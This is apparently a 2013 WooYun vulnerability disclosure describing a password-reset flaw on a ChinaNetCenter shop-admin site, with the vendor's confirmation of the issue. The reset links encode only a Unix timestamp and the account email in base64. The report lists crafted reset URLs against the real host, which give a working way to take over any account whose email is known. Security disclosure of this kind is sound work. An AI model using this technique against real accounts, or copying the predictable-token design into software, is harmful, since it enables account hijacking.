当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-046615

漏洞标题:网宿科技某站任意用户密码重置漏洞分析

相关厂商:网宿科技

漏洞作者: 专业种田

提交时间:2013-12-21 02:18

修复时间:2014-02-04 02:19

公开时间:2014-02-04 02:19

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-21: 细节已通知厂商并且等待厂商处理中
2013-12-21: 厂商已经确认,细节仅向厂商公开
2013-12-31: 细节向核心白帽子及相关领域专家公开
2014-01-10: 细节向普通白帽子公开
2014-01-20: 细节向实习白帽子公开
2014-02-04: 细节向公众公开

简要描述:

RT

详细说明:

还是那个云产品
找回密码重置链接设计缺陷。
http://www.ecb.chinanetcenter.com/shop_admin/forgot.php
操作找回密码

a1.jpg


a2.jpg


进入邮箱后看到重置密码链接地址中的加密串,很容易看出是base64方式加密

a3.jpg


解密后t值为1387557978,m值为注册邮箱,一开始以为t值为用户id,登录后各个页面翻了一次,也没有找到该id。
重试一次找回密码,收到邮件t值不一样,但位数一样,突然明白了,这是unix的当前时间戳
既然二个值都有了,知道用户帐号(注册邮箱)的情况下就可以重置任意用户密码了。
测试方法:
使用一个自己的帐号及目标的帐号同时点击找回密码,先后相差几秒钟的时间也没问题。
查看自己帐号收到的重置链接,解密t的值,如为:1387557978 ,生成比1387557978 大10的10个base64加密串(找回密码时目标帐号比自己帐号后操作,操作快的话肯定在10秒内),然后组合出10个地址

http://www.ecb.chinanetcenter.com/shop_admin/forgot.php?action=password&t=1387557979&m=目标帐号base64加密串
http://www.ecb.chinanetcenter.com/shop_admin/forgot.php?action=password&t=1387557980&m=目标帐号base64加密串
http://www.ecb.chinanetcenter.com/shop_admin/forgot.php?action=password&t=1387557981&m=目标帐号base64加密串
http://www.ecb.chinanetcenter.com/shop_admin/forgot.php?action=password&t=1387557982&m=目标帐号base64加密串
http://www.ecb.chinanetcenter.com/shop_admin/forgot.php?action=password&t=1387557983&m=目标帐号base64加密串
http://www.ecb.chinanetcenter.com/shop_admin/forgot.php?action=password&t=1387557984&m=目标帐号base64加密串
http://www.ecb.chinanetcenter.com/shop_admin/forgot.php?action=password&t=1387557985&m=目标帐号base64加密串
省略....


其中一个链接时间点对了就可以重置密码了。

漏洞证明:

a4.jpg

修复方案:

不要使用可预知的内容做为加密串

版权声明:转载请注明来源 专业种田@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-12-21 12:42

厂商回复:

非常感谢,我们已在修复控制逻辑。目前该平台仅用于产品展示,不涉及客户信息

最新状态:

暂无